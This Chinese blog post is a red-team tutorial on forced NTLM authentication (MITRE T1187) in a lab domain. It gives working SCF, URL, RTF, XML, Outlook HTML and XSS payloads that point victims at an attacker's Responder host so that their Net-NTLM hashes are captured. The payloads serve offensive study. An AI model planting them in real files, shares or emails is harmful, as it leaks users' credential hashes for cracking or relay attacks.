T1187 强制 NTLM 认证

最新推荐文章于 2024-03-18 19:46:57 发布
最新推荐文章于 2024-03-18 19:46:57 发布
阅读量1.3k 收藏
点赞数
分类专栏: 内网渗透 文章标签: NTLM T1187 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_28205153/article/details/119789931
版权

在上一篇文章 一文理解 Windows 身份验证原理 介绍了什么是 NTLM 以及一些利用 NTLM 进行更一步获取权限的方式,其中就有 NTLM 中继、 Net-NTLM hash 破解。但实现这些利用,需要发起 NTLM 请求,本文章介绍下如何强制发起 NTLM 请求。

环境准备

本文章的环境是根据之前文章 搭建一个简单的Windows域环境 搭建的。先在 kali 上启动 Responder 来监听 Net-NTLM hash 。kali 的 ip 为 172.16.108.4

responder -I eth0

在这里插入图片描述
接着在 Windows Server 2012 域控主机上安装 office ,用于后续测试。
下面介绍一些强制进行 NTLM 认证的方式,让 Windows 2012 强制向 kali 主机发起 NTLM 请求,从而获取域控账号的 Net-NTLM hash,当然也可以进行 NTLM 中继攻击,具体方法请查看上一篇文章。

1. 通过超链接执行

让我们创建一个Word文档,该文档具有指向 kali 服务器的超链接
在这里插入图片描述

在这里插入图片描述
超链接地址为 \172.16.108.4\1.txt ,也就是 kali 服务器 Responder 的地址
在这里插入图片描述
在用户诱导点击后,会在 Responder 上收到发起的 NTLM 请求,成功获取 Net-NTLM hash
在这里插入图片描述
所以不要随便打开文档中的超链接,即使没病毒,也可能被进行强制认证。

2. 通过 .SCF 文件执行

编辑一个 fa.scf 文件,内容如下

[Shell]Command=2
IconFile=\\172.16.108.4\nc.ico
[Taskbar]
Command=ToggleDesktop

当用户打开存放该文件的目录时,fa.scf 会自动执行,自动解析图标所指的链接。迫使受害系统尝试在 Responder 正在侦听的 172.16.108.4 处对攻击系统进行 NTLM 身份验证。也可以把该文件放在共享目录上,用户打开该共享目录时,就会进行强制认证。

可以先删除 Responder 的缓存再进行测试,不然会显示跳过之前捕获的 hash

rm /usr/share/responder/Responder.db

重新打开存在 fa.scf 文件的目录,或者点刷新,就可以发起 NTLM 认证了
在这里插入图片描述
在这里插入图片描述

3. 通过 .URL 文件执行

创建一个 a.url 文件,内容如下,并将其上传到受害者系统:

[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\172.16.108.4\1.icon
IconIndex=1

当用户打开存放该文件的目录时,a.url 会自动执行,自动解析图标所指的链接。迫使受害系统尝试在 Responder 正在侦听的 172.16.108.4 处对攻击系统进行 NTLM 身份验证
在这里插入图片描述

在这里插入图片描述

4. 通过.RTF文件执行

新建一个 file.rtf 文件,它将尝试从攻击系统加载图像:

{\rtf1{\field{\*\fldinst {INCLUDEPICTURE "file://172.16.108.4/test.jpg" \\* MERGEFORMAT\\d}}{\fldrslt}}}

在受害者系统上执行 file.rtf 会被强制进行 NTLM 认证:
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

5. 通过.XML 文件执行

Word文档可以另存为.xml
在这里插入图片描述
Word文档可以另存为.xml
可以通过包含一个从攻击者控制的服务器请求文档样式表的标签(第3行)来进行 NTLM 强制认证。 当打开该 xml 文档时,会进行 NTLM 认证。

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><?mso-application progid="Word.Document"?><?xml-stylesheet type="text/xsl" href="\\172.16.108.4\bad.xsl" ?>

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

6. 通过Field IncludePicture执行

创建一个新的Word文档并插入一个域IncludePicture:
在这里插入图片描述

在这里插入图片描述
将文件另存为.xml 或者 docx。 启动文档会进行强制 NTLM 认证
在这里插入图片描述

在这里插入图片描述

7. 通过 Outlook 执行

如果目标系统未运行最新版本的Windows / Outlook,则可以制作这样的电子邮件,使攻击者无需用户进行任何干预即可窃取受害者的 NetNTLMv2 哈希-单击电子邮件即可预览并发起强制 NTLM 认证。 请注意,此攻击不适用于Windows 10和Outlook 2016版本的最新版本,或者需要在outlook设置开启自动加载图片。
在这里插入图片描述
使用以下内容发送邮件到outlook:

<html><h1>holla good sir</h1><img src="file://172.16.108.4/download.jpg"></html>

在这里插入图片描述
RTF文件也可以使用:

{\rtf1{\field{\*\fldinst {INCLUDEPICTURE "file://172.16.108.4/test.jpg" \\* MERGEFORMAT\\d}}{\fldrslt}}}

在收到邮件后点击该邮件,会自动加载图片进行 NTLM 认证
在这里插入图片描述

在这里插入图片描述

8. 通过漏洞发起 NTLM请求

使用常见的Web漏洞,也可以发起 NTLM 请求,如 XSS、SSRF、XXE等可以导致服务器去访问一个URL的漏洞。以 XSS 为例,新建一个 html 文件。里面存在 XSS 利用代码

<html><script src="//172.16.108.4/1.js"><html/>

由于 Windows server 版本的 IE 启用了保护模式,所以需要关闭才可以自动加载外部脚本。
在这里插入图片描述
关闭后,打开 html 文件,即可进行 NTLM 认证

在这里插入图片描述
在这里插入图片描述

参考链接

https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication
https://www.anquanke.com/post/id/193493
https://attack.mitre.org/techniques/T1187/

本文章也在我的公众号发布
我的安全专家之路

TimeShatter
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NTLM认证基本原理及编程简介
10-28
NTLM 认证基本原理及编程简介 NTLM 认证是一种广泛使用的身份验证机制,它在 Windows NT 系统中广泛应用。NTLM 认证机制是基于挑战/响应模式的,它可以 garantir 服务器和客户机之间的身份验证。下面是 NTLM 认证的...
网络安全之渗透实战学习
xv7676的博客
05-25 319
对于SCF文件攻击,我们也可以通过下列方法来防止这种攻击的发生:1、使用Kerbeors认证或SMB签名;2、禁用共享文件给未认证用户所提供的写入权限;3、确保使用的是NTLMv2密码并增加口令的复杂程度。
两种网络身份认证协议的工作流程——NTLM和Kerberos
Neonline254的博客
08-19 1888
NTLM和Kerberos是内网渗透中最常见的两种身份认证协议。理解它们的工作流程也是理解相应内网攻击手段的前置条件(如针对NTLM的中继攻击、针对Kerberos的黄金、白银票据攻击及委派攻击等)。
内网安全之-NTLM协议详解
最新发布
weixin_45910629的博客
03-18 2258
不同的SSP,实现的身份验证机制是不一样的。因此当我们获取到了用户密码的 NTLM Hash 而没有解出明文时,我们可以利用该 NTLM Hash 进行哈希传递攻击,对内网其他机器进行 Hash 碰撞,碰撞到使用相同密码的机器。它是发生在 NTLM 认证的第三步,在 Response 消息中存在 Net-NTLM Hash,当攻击者获得了 Net-NTLM Hash 后,可以进行中间人攻击,重放 Net- NTLM Hash,这种攻击手法也就是 NTLM Relay(NTLM 中继)攻击。
Windows系统安全风险-本地NTLM重放提权
wwwwestcn的博客
11-23 1936
经我司安全部门研究分析,近期利用NTLM重放机制入侵Windows 系统事件增多,入侵者主要通过Potato程序攻击拥有SYSTEM权限的端口伪造网络身份认证过程,利用NTLM重放机制骗取SYSTEM身份令牌,最终取得系统权限,该安全风险微软并不认为存在漏洞,所以不会进行修复,为了您的服务器安全,我们建议您进行一下安全调整: 1、关闭DCOM功能 下面列出关闭DCOM步骤win2008/2012/2016/2019均适用 打开控制面板->管理工具->组件服务 展开组件服务-计算机,右...
另一种取消NTLM验证的方法
蓝色的雨
09-11 2067
我在自己机器(XP SP2)下测试成功,听说WIN2000不行,在某些机器上也很多问题。不管怎么说,还是先放起来先。直接运行命令: tlntadmn config sec = -ntlm
ntml.rar_NTLM_NTML_ntlm算法_ntml协议认证_ntml认证
09-23
NTLM(NT LAN Manager)是Windows操作系统中使用的一种身份验证协议,主要负责在网络环境中提供安全认证服务。在本文中,我们将深入探讨NTLM的工作原理、挑战模式、散列认证过程以及NTLM算法的实现。 NTLM协议是...
axis2客户端调用带Ntlm认证例子
10-19
在IT行业中,尤其是在Web服务和企业级应用集成的领域,NTLM(NT LAN Manager)认证是一种常见的身份验证机制,尤其在Windows环境中。Axis2是一个流行的Java Web服务框架,它允许开发人员创建、部署和消费Web服务。本...
利用ActiveX通过NTLM认证的实例+讲解
12-18
总的来说,利用ActiveX通过NTLM认证是一种早期的Web应用程序认证方法,虽然在某些特定场景下仍然有用,但已不再符合当前网络安全的最佳实践。随着技术的发展,理解并掌握更加安全和现代的认证机制对于IT专业人士来说...
NTLM认证的Go Go HTTP请求-Golang开发
05-26
go-http-ntlm是一个Go程序包,其中包含用于http.Client的NTLM传输(http.RoundTripper实现),以发出NTLM身份验证受保护的http请求。 go-http-ntlm go-http-ntlm是一个Go程序包,其中包含用于http.Client的NTLM传输...
去掉ntml验证的另一种方法
12-22 1031
文章作者:紫幻[EST顾问团成员]信息来源:邪恶八进制 中国相信大家都对telnet比较熟悉吧。hacking的时候经常用到的系统自带shell尤其是注射的时候,但是最讨厌的就是ntlm认证了,以前大家去掉ntlm的方法一般有2种。1 上传ntml.exe 这种方法有很多缺点,比如:对方有杀毒软件,很多网段屏蔽了TFTP.2 直接写入telnet的配置信息到文本中然后在用shell执行。 这种办法
NTLM环境配置教程
暧暧远人村,依依墟里烟 ...
09-29 2485
一, 步驟(轉自:https://code.google.com/p/wallproxy/wiki/NTLM)         实现方式:由于Wallproxy本身不支持NTLM验证,所以我们使用CNTLM,CNTLM可以把NTLM代理转为一个普通的代理 (官网:http://sourceforge.net/projects/cntlm/)     具体cntlm的使用方法可以参考官方wiki
红队笔记之Windows网络认证NTLM协议浅析
明光札记
10-24 4965
渗透测试之Windows网络认证NTLM协议浅析 文章目录渗透测试之Windows网络认证NTLM协议浅析NTLM 协议NTLM 协议在工作组环境下的应用协商:质询Chalenge/Response与验证:NTLM 协议在域环境下的应用协商:质询Chalenge/Response与验证:哈希传递PTH(Pass The Hash)PTH原理PTH条件PTH利用PTH防御 NTLM 协议 NTLM协议是在Microsoft环境中使用的一种身份验证协议,它允许用户向服务器证明自己是谁(挑战(Chalenge)/
【学习笔记】内网安全4-NTLM认证禁用对策
Lazy_SugaR的博客
05-29 846
概念 PTH(pass the hash) 利用lm或ntlm的值进行渗透测试 PTT(pass the ticket) 利用的票据凭证TGT进行的渗透测试 PTK(pas the key) 利用ekeys、aes256进行的渗透测试 分析 #PTH在内网渗透中是一种经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不是提供明文面 #PTK:如果禁用了NTLM认证,PsExec无法利用获得的NTLM Hash进行远程连接,但是使用mimikatz还是
telnet中去除ntlm验证的方法
weixin_34270865的博客
09-21 195
相信大家都对telnet比较熟悉吧。远程连的时候经常用到的系统自带shell尤其是注射的时候,但是最讨厌的就是ntlm认证了,以前大家去掉ntlm的方法一般有2种。 1 上传ntlm.exe 这种方法有很多缺点,比如:对方有杀毒软件,很多网段屏蔽了TFTP。 2  直接写入telnet的配置信息到文本中然后在用shell执行,这种办法非常麻烦。 下面有个方法很好用。 那就是直接...
“解密“Windows NTLM Hash
热门推荐
Yale的博客
03-22 1万+
从hashcat 3.30开始,在虚拟机中运行hashcat经常会报错,提示GPU错误。这是由于从该版本开始,hashcat对于Intel CPU会自动检测Intel OpenCL运行时,即是否支持GPU破解。如果不支持,就会停止运行。为了便于实验,我们使用2.0版本的hashcat 安装: wget https://hashcat.net/files/hashcat-2.00.7z 7z e h...
深入详解windows安全认证机制ntlm&Kerberos
weixin_30448603的博客
11-18 1046
0x01 为什么要理解windows 安全认证机制: 加深对后续各种漏洞利用的理解深度,还是那句话,要知其然,更要知其所以然,不废话,咱们直接开始 0x02 windows认证协议主要有以下两种: 基于ntlm认证方式,主要用在早期的windows工作组环境中,认证的过程也相对比较简单 另一种是基于Kerberos的认证方式,主要用在域环境中,下面就这两种不同的认证方式做些简要的通信流程...
那telnet是使用NTLM认证吗?
07-12
Telnet协议本身不使用NTLM(Windows NT LAN Manager)认证NTLM是一种认证协议,通常用于Windows操作系统上进行身份验证。Telnet协议在登录过程中使用的是基本的明文身份验证,而不是使用NTLM。基本的Telnet身份...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值